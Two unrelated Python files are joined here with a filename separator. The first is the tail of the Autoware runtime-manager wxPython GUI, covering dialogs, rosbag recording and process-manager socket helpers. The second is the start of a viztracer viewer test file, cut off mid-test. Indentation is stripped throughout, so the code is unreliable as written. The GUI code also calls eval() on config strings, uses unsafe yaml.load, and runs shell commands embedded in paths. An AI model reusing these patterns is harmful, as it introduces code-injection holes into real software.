szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def create_bmbtn(self, filename, hdr):
dir = rtmgr_src_dir()
bm = wx.Bitmap(dir + filename, wx.BITMAP_TYPE_ANY)
style = wx.BORDER_NONE | wx.BU_EXACTFIT
obj = wx.lib.buttons.GenBitmapButton(self, wx.ID_ANY, bm, style=style)
self.Bind(wx.EVT_BUTTON, hdr, obj)
return obj
def get_v(self):
if self.kind in [ 'radio_box', 'menu' ]:
return self.choices_sel_get()
if self.kind in [ 'checkbox', 'toggle_button' ]:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in [ 'path', 'str' ]:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int( self.int_max * (v - self.min) / self.w if self.w != 0 else 0 )
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def OnIncBtn(self, event):
step = self.get_step()
self.add_v(step)
def OnDecBtn(self, event):
step = self.get_step()
self.add_v(-step)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def add_v(self, step):
ov = self.get_v()
self.tc.SetValue(str(ov + step))
v = self.get_v()
if v != ov:
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in [ 'path' ]
class MyDialogParam(rtmgr.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogParam.__init__(self, *args, **kwds)
set_size_gdic(self, gdic)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel( gdic.get(ok_lb_key) )
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogDpm(rtmgr.MyDialogDpm):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogDpm.__init__(self, *args, **kwds)
set_size_gdic(self, gdic)
self.Bind(wx.EVT_CLOSE, self.OnClose)
parent = self.panel_v
frame = self.GetParent()
self.frame = frame
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnLink(self, event):
obj = event.GetEventObject()
dic = { self.hyperlink_car : self.frame.button_car_dpm,
self.hyperlink_pedestrian : self.frame.button_pedestrian_dpm }
obj = dic.get(obj)
if obj:
self.frame.OnHyperlinked_obj(obj)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogCarPedestrian(rtmgr.MyDialogCarPedestrian):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogCarPedestrian.__init__(self, *args, **kwds)
set_size_gdic(self)
self.Bind(wx.EVT_CLOSE, self.OnClose)
frame = self.GetParent()
self.frame = frame
self.SetTitle(prm.get('name', ''))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnLink(self, event):
obj = event.GetEventObject()
car_ped = { self.hyperlink_car : 'car', self.hyperlink_pedestrian : 'pedestrian' }.get(obj, 'car')
obj_key = self.gdic.get('car_pedestrian_obj_key', {}).get(car_ped)
obj = getattr(self.frame, 'button_' + obj_key, None) if obj_key else None
if obj:
self.frame.OnHyperlinked_obj(obj)
self.EndModal(0)
def OnClose(self, event):
self.EndModal(-1)
class MyDialogLaneStop(rtmgr.MyDialogLaneStop):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogLaneStop.__init__(self, *args, **kwds)
set_size_gdic(self)
self.frame = self.GetParent()
name = 'lane_stop'
var = next( ( var for var in self.prm.get('vars', []) if var.get('name') == name ), {} )
v = self.pdic.get( name, var.get('v', False) )
set_val(self.checkbox_lane_stop, v)
def update(self):
update_func = self.gdic.get('update_func')
if update_func:
update_func(self.pdic, self.gdic, self.prm)
def OnTrafficRedLight(self, event):
self.pdic['traffic_light'] = 0
self.update()
def OnTrafficGreenLight(self, event):
self.pdic['traffic_light'] = 1
self.update()
def OnTrafficLightRecognition(self, event):
pub = rospy.Publisher('/config/lane_stop', ConfigLaneStop, latch=True, queue_size=10)
msg = ConfigLaneStop()
v = event.GetEventObject().GetValue()
self.pdic['lane_stop'] = v
msg.manual_detection = not v
pub.publish(msg)
def OnOk(self, event):
self.EndModal(0)
def OnCancel(self, event):
self.EndModal(-1)
class MyDialogNdtMapping(rtmgr.MyDialogNdtMapping):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogNdtMapping.__init__(self, *args, **kwds)
set_size_gdic(self)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.update_filename()
self.klass_msg = ConfigNdtMappingOutput
self.pub = rospy.Publisher('/config/ndt_mapping_output', self.klass_msg, queue_size=10)
def update_filename(self):
tc = self.text_ctrl_path
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%02d%02d%02d.pcd' % (
now.year % 100, now.month, now.day)
path = os.path.join(dn, fn)
set_path(tc, path)
def OnRef(self, event):
tc = self.text_ctrl_path
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnRadio(self, event):
v = self.radio_btn_filter_resolution.GetValue()
tc = self.text_ctrl_filter_resolution
tc.Enable(v)
def OnPcdOutput(self, event):
tc = self.text_ctrl_filter_resolution
v = tc.GetValue() if self.radio_btn_filter_resolution.GetValue() else '0.0'
msg = self.klass_msg()
msg.filename = self.text_ctrl_path.GetValue()
msg.filter_res = str_to_float(v)
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
class InfoBarLabel(wx.BoxSizer):
def __init__(self, parent, btm_txt=None, lmt_bar_prg=90, bar_orient=wx.VERTICAL):
wx.BoxSizer.__init__(self, orient=wx.VERTICAL)
self.lb = wx.StaticText(parent, wx.ID_ANY, '')
self.bar = BarLabel(parent, hv=bar_orient, show_lb=False)
bt = wx.StaticText(parent, wx.ID_ANY, btm_txt) if btm_txt else None
self.Add(self.lb, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bar_orient == wx.VERTICAL:
sz = self.bar.GetSize()
sz.SetWidth(20)
self.bar.SetMinSize(sz)
self.Add(self.bar, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bt:
self.Add(bt, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
else:
szr = wx.BoxSizer(wx.HORIZONTAL)
if bt:
szr.Add(bt, 0, 0, 0)
szr.Add(self.bar, 1, 0, 0)
self.Add(szr, 1, wx.EXPAND, 0)
self.lmt_bar_prg = lmt_bar_prg
def lb_set(self, txt, col):
self.lb.SetForegroundColour(col)
self.lb.SetLabel(txt)
self.Layout()
def bar_set(self, prg):
(col1, col2) = (wx.Colour(0,0,250), wx.Colour(0,0,128))
if prg >= self.lmt_bar_prg:
(col1, col2) = (wx.Colour(250,0,0), wx.Colour(128,0,0))
self.bar.set_col(col1, col2)
self.bar.set(prg)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [ wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n) ]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [ True for box in self.boxes ]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [ box.GetValue() for box in self.boxes ]
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL, show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250,250,250)
self.dflt_col2 = wx.Colour(128,128,128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w,h) = self.GetSize()
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h-p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w-p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h-p)
dc.GradientFillLinear(rect, wx.Colour(200,200,200), wx.Colour(220,220,220), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250,250,250), wx.Colour(250,250,250), self.dir)
class ColorLabel(wx.Panel):
def __init__(self, parent, lst=[], pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lst = lst
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, lst):
self.lst = lst
self.Refresh()
def OnPaint(self, event):
dc = wx.PaintDC(self)
dc.Clear()
#change_font_point_by_rate(dc, 0.75)
(x,y) = (0,0)
(_, h, _, _) = dc.GetFullTextExtent(' ')
for v in self.lst:
if type(v) is tuple and len(v) == 2:
(x,y) = v
elif type(v) is tuple and len(v) == 3:
dc.SetTextForeground(v)
elif v == '\n':
(x,y) = (0,y+h)
elif type(v) is str:
dc.DrawText(v, x, y)
(w, _, _, _) = dc.GetFullTextExtent(v)
x += w
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
class MyDialogRosbagRecord(rtmgr.MyDialogRosbagRecord):
def __init__(self, *args, **kwds):
self.cmd_dic = kwds.pop('cmd_dic')
rtmgr.MyDialogRosbagRecord.__init__(self, *args, **kwds)
self.cbs = []
self.refresh()
self.parent = self.GetParent()
self.cmd_dic[ self.button_start ] = ('rosbag record', None)
self.toggles = [ self.button_start, self.button_stop ]
def OnRef(self, event):
tc = self.text_ctrl
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnStart(self, event):
key_obj = self.button_start
path = self.text_ctrl.GetValue()
if path == '':
print('path=""')
return
topic_opt = []
if self.cbs[0].GetValue(): # 'All'
topic_opt = [ '-a' ]
else:
for obj in self.cbs:
if obj.GetValue():
topic_opt += [ obj.GetLabel() ]
if topic_opt == []:
print('topic=[]')
return
args = topic_opt + [ '-O', path ]
split_arg = [ '--split' ] if self.checkbox_split.GetValue() else []
size_arg = self.size_arg_get()
if split_arg and not size_arg:
wx.MessageBox('size is required, with split')
return
args += split_arg + size_arg
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(True, cmd, proc, add_args=args, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
def OnStop(self, event):
key_obj = self.button_start
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(False, cmd, proc, sigint=True, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
self.Hide()
def OnRefresh(self, event):
self.refresh()
def refresh(self):
lst = [ 'all' ] + subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_1
szr = self.sizer_topic
for obj in self.cbs:
szr.Remove(obj)
obj.Destroy()
self.cbs = []
for topic in lst:
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
bdr = 4 if topic == 'All' else 4 * 4
szr.Add(obj, 0, wx.LEFT, bdr)
self.cbs.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
self.update_filename()
def update_filename(self):
tc = self.text_ctrl
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%04d%02d%02d%02d%02d%02d.rosbag' % (
now.year, now.month, now.day, now.hour, now.minute, now.second)
path = os.path.join(dn, fn)
set_path(tc, path)
def size_arg_get(self):
tc = self.text_ctrl_size
s = tc.GetValue()
mb = 0
try:
mb = str_to_float(s)
except ValueError:
mb = 0
if mb <= 0:
tc.SetValue('')
return [ '--size=' + str(int(mb * 1024 * 1024)) ] if mb > 0 else []
def set_size_gdic(dlg, gdic={}):
(w, h) = dlg.GetSize()
if not gdic:
gdic = getattr(dlg, 'gdic', {})
nw = gdic.get('dialog_width', w)
nh = gdic.get('dialog_height', h)
if (w, h) != (nw, nh):
dlg.SetSize((nw, nh))
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = { 'save' : wx.FD_SAVE, 'multi' : wx.FD_MULTIPLE }
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([ path + '/' + fn for fn in fns ])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = ( v , btn.IsEnabled() )
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = { wx.EVT_TOGGLEBUTTON.typeId : None,
wx.EVT_LEFT_DOWN.typeId : True,
wx.EVT_LEFT_UP.typeId : False }
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [ getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key ]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def load_yaml(filename, def_ret=None):
dir = rtmgr_src_dir()
path = dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def terminate_children(proc, sigint=False):
for child in psutil.Process(proc.pid).get_children():
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def cut_esc(s):
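# Strip ANSI escape sequences (ESC ... 'm') from s.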
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j+1:]
return s
def change_font_point_by_rate(obj, rate=1.0):
font = obj.GetFont()
pt = font.GetPointSize()
pt = int(pt * rate)
font.SetPointSize(pt)
obj.SetFont(font)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def scaled_bitmap(bm, scale):
(w, h) = bm.GetSize()
img = wx.ImageFromBitmap(bm)
img = img.Scale(w * scale, h * scale, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(img)
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
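# Translate flag name strings into wx style flags and combine them into one value.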
dic = { 'top' : wx.TOP, 'bottom' : wx.BOTTOM, 'left' : wx.LEFT, 'right' : wx.RIGHT,
'all' : wx.ALL, 'expand' : wx.EXPAND, 'fixed_minsize' : wx.FIXED_MINSIZE,
'center_v' : wx.ALIGN_CENTER_VERTICAL, 'center_h' : wx.ALIGN_CENTER_HORIZONTAL,
'passwd' : wx.TE_PASSWORD }
lst = [ dic.get(f) for f in flags if f in dic ]
return reduce(lambda a,b : a+b, [0] + lst)
def msg_path_to_obj_attr(msg, path):
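# Walk a dotted attribute path on msg; return (parent object, final attribute name).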
lst = path.split('.')
obj = msg
for attr in lst[:-1]:
obj = getattr(obj, attr, None)
return (obj, lst[-1])
def str_to_rosval(s, type_str, def_ret=None):
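# Convert the string s to the Python type matching a ROS primitive type name;
# return def_ret for unknown types.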
cvt_dic = {
'int8':int , 'int16':int , 'int32':int ,
'uint8':int , 'uint16':int , 'uint32':int ,
'int64':long , 'uint64':long,
'float32':float, 'float64':float,
}
t = cvt_dic.get(type_str)
s = s.replace(',','.') if t is float and type(s) is str else s
return t(s) if t else def_ret
def str_to_float(s):
return float( s.replace(',','.') )
def set_path(tc, v):
tc.SetValue(v)
tc.SetInsertionPointEnd()
def set_val(obj, v):
func = getattr(obj, 'SetValue', getattr(obj, 'Check', None))
if func:
func(v)
obj_refresh(obj)
if type(obj) is wx.ToggleButton:
button_color_change(obj)
def enables_set(obj, k, en):
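# Track per-key enable requests on the widget; it is enabled only while every
# recorded request is True. Hyperlinks also get their colour greyed when disabled.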
d = attr_getset(obj, 'enabLes', {})
d[k] = en
d['last_key'] = k
obj.Enable( all( d.values() ) )
if isinstance(obj, wx.HyperlinkCtrl):
if not hasattr(obj, 'coLor'):
obj.coLor = { True:obj.GetNormalColour(), False:'#808080' }
c = obj.coLor.get(obj.IsEnabled())
obj.SetNormalColour(c)
obj.SetVisitedColour(c)
def enables_get(obj, k, def_ret=None):
return attr_getset(obj, 'enabLes', {}).get(k, def_ret)
def enables_get_last(obj):
k = enables_get(obj, 'last_key')
return (k, enables_get(obj, k))
def obj_refresh(obj):
if type(obj) is CT.GenericTreeItem:
while obj.GetParent():
obj = obj.GetParent()
tree = obj.GetData()
tree.Refresh()
# dic_list util (push, pop, get)
def dic_list_push(dic, key, v):
dic_getset(dic, key, []).append(v)
def dic_list_pop(dic, key):
dic.get(key, [None]).pop()
def dic_list_get(dic, key, def_ret=None):
return dic.get(key, [def_ret])[-1]
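# backup-stack helpers: save the current dic[key] onto a '<key>_bak_str' stack
# and restore (or delete) it later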
def bak_stk_push(dic, key):
if key in dic:
k = key + '_bak_str'
dic_getset(dic, k, []).append( dic.get(key) )
def bak_stk_pop(dic, key):
k = key + '_bak_str'
stk = dic.get(k, [])
if len(stk) > 0:
dic[key] = stk.pop()
else:
del dic[key]
def bak_stk_set(dic, key, v):
bak_stk_push(dic, key)
dic[key] = v
def attr_getset(obj, name, def_ret):
if not hasattr(obj, name):
setattr(obj, name, def_ret)
return getattr(obj, name)
def dic_getset(dic, key, def_ret):
if key not in dic:
dic[key] = def_ret
return dic.get(key)
def lst_append_once(lst, v):
exist = v in lst
if not exist:
lst.append(v)
return exist
def lst_remove_once(lst, v):
exist = v in lst
if exist:
lst.remove(v)
return exist
def get_top(lst, def_ret=None):
return lst[0] if len(lst) > 0 else def_ret
def adjust_num_str(s):
if '.' in s:
while s[-1] == '0':
s = s[:-1]
if s[-1] == '.':
s = s[:-1]
return s
def rtmgr_src_dir():
return os.path.abspath(os.path.dirname(__file__)) + "/"
def path_expand_cmd(path):
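# If the first path component is of the form '$(command args)', run the command
# and replace that component with the command's output.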
lst = path.split('/')
s = lst[0]
if s[:2] == '$(' and s[-1] == ')':
cmd = s[2:-1].split(' ')
lst[0] = subprocess.check_output(cmd).strip()
path = '/'.join(lst)
return path
def eval_if_str(self, v):
return eval(v) if type(v) is str else v
def dic_eval_if_str(self, dic, key, def_ret=None):
return eval_if_str( self, dic.get(key, def_ret) )
def prn_dict(dic):
for (k,v) in dic.items():
print (k, ':', v)
def send_to_proc_manager(order):
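# Send the order dict (serialized as YAML) to the process manager over its UNIX
# socket; returns True when the manager replies 0, or -1 if the connection fails.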
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(PROC_MANAGER_SOCK)
except socket.error:
print('Failed connect to {}'.format(PROC_MANAGER_SOCK))
return -1
sock.send(yaml.dump(order))
ret = sock.recv(1024)
sock.close()
return int(ret) == 0
def set_process_nice(proc, value):
order = {
"name": "nice",
"pid": proc.pid,
"nice": value
}
return send_to_proc_manager(order)
def set_process_cpu_affinity(proc, cpus):
order = {
"name": "cpu_affinity",
"pid": proc.pid,
"cpus": cpus,
}
return send_to_proc_manager(order)
def shutdown_proc_manager():
order = {
"name": "shutdown",
}
return send_to_proc_manager(order)
def set_scheduling_policy(proc, policy, priority):
order = {
"name": "scheduling_policy",
"pid": proc.pid,
"policy": policy,
"priority": priority,
}
return send_to_proc_manager(order)
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
# EOF
|
test_viewer.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/gaogaotiantian/viztracer/blob/master/NOTICE.txt
from .cmdline_tmpl import CmdlineTmpl
import json
import multiprocessing
import os
import signal
import socket
import subprocess
import sys
import time
import tempfile
import unittest.mock
import urllib.request
from viztracer.viewer import viewer_main
import webbrowser
class Viewer(unittest.TestCase):
def __init__(self, file_path, once=False):
if os.getenv("COVERAGE_RUN"):
self.cmd = ["coverage", "run", "-m", "--parallel-mode", "--pylib", "viztracer.viewer", "-s", file_path]
else:
self.cmd = ["vizviewer", "-s", file_path]
if once:
self.cmd.append("--once")
self.process = None
super().__init__()
def run(self):
self.process = subprocess.Popen(self.cmd)
self._wait_until_socket_on()
self.assertIs(self.process.poll(), None)
def stop(self):
self.process.send_signal(signal.SIGINT)
self.process.wait(timeout=20)
self.assertEqual(self.process.returncode, 0)
def _wait_until_socket_on(self):
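# Poll 127.0.0.1:9001 (up to 10 attempts, one second apart) until the viewer's
# server accepts connections; otherwise fail the test.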
for _ in range(10):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
result = sock.connect_ex(('127.0.0.1', 9001))
sock.close()
if result == 0:
return
time.sleep(1)
self.fail("Can't connect to 127.0.0.1:9001")
class MockOpen(unittest.TestCase):
def __init__(self, file_content):
self.p = None
self.file_content = file_content
super().__init__()
def get_and_check(self, url, expected):
time.sleep(0.5)
resp = urllib.request.urlopen(url)
self.assertEqual(resp.read().decode("utf-8"), expected)
def __call__(self, url):
self.p = multiprocessing.Process(target=self.get_and_check, args=(url, self.file_content))
self.p.start()
class TestViewer(CmdlineTmpl):
@unittest.skipIf(sys.platform == "win32", "Can't send Ctrl+C reliably on Windows")
def test_json(self):
json_script = '{"file_info": {}, "traceEvents": []}'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".json", delete=False) as f:
f.write(json_script)
v = Viewer(f.name)
try:
v.run()
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
self.assertTrue(resp.code == 200)
resp = urllib.request.urlopen("http://127.0.0.1:9001/file_info")
self.assertEqual(json.loads(resp.read().decode("utf-8")), {})
resp = urllib.request.urlopen("http://127.0.0.1:9001/localtrace")
self.assertEqual(json.loads(resp.read().decode("utf-8")), json.loads(json_script))
finally:
v.stop()
finally:
os.remove(f.name)
@unittest.skipIf(sys.platform == "win32", "Can't send Ctrl+C reliably on Windows")
def test_html(self):
html = '<html></html>'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".html", delete=False) as f:
f.write(html)
v = Viewer(f.name)
try:
v.run()
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
self.assertTrue(resp.code == 200)
finally:
v.stop()
finally:
os.remove(f.name)
def test_once(self):
html = '<html></html>'
try:
with tempfile.NamedTemporaryFile(mode="w", suffix=".html", delete=False) as f:
f.write(html)
v = Viewer(f.name, once=True)
v.run()
time.sleep(0.5)
resp = urllib.request.urlopen("http://127.0.0.1:9001")
v.process.wait(timeout=20)
self.assertTrue(resp.code == 200)
self.assertTrue(v.process.returncode == 0)
finally:
os.remove(f.name)
json_script = '{"file_info": {}, "traceEvents": []}'
try:
